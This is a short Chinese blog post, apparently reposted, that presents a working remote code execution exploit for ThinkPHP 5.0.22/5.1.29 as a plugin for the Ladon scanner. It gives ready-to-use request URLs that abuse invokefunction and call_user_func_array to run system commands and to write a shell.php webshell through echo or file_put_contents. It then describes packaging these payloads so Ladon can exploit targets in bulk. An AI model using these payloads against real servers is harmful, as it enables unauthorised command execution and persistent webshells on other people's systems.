Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit - K8哥哥
2020-02-14 15:54:00 Author: www.cnblogs.com(查看原文) 阅读量:782 收藏

前言

使用Exp生成器生成Ladon插件实战,ThinkPHP GetShell

漏洞环境

使用docker ThinkPHP 5.0.20

复现测试

执行命令

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入文件

GetShell1

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php

GetShell2

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL编码内容

视频教程

通过EXP生成器将以上Payload转成DLL,使用Ladon即可批量利用,详情请观看视频教程

Video: K8Cscan ThinkPHP 5.x RCE Exploit

posted @ 2020-02-14 14:54  K8哥哥  阅读(...)  评论(...编辑  收藏

Copyright © 2020 K8哥哥
Powered by .NET Core 3.1.1 on Linux


文章来源: http://www.cnblogs.com/k8gege/p/12307453.html
如有侵权请联系:admin#unsafe.sh